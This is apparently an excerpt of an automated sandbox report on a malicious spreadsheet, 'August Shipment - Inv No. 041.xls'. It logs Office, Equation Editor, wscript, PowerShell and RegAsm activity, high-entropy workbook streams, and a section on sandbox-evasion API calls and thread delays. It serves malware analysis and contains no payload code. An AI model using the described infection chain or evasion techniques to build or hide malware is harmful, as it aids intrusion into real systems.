                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: August Shipment - Inv No. 041.xlsStream path 'Workbook' entropy: 7.999244781 (max. 8.0)
                Source: C9730000.0.drStream path 'Workbook' entropy: 7.99933386177 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F7E2 Sleep,ExitProcess,14_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 434Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2189Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1085Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1060Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8431Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1661Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-53741
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3088Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 1085 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 5828 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1980Thread sleep count: 1060 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1980Thread sleep time: -3180000s >= -30000sJump to behavior
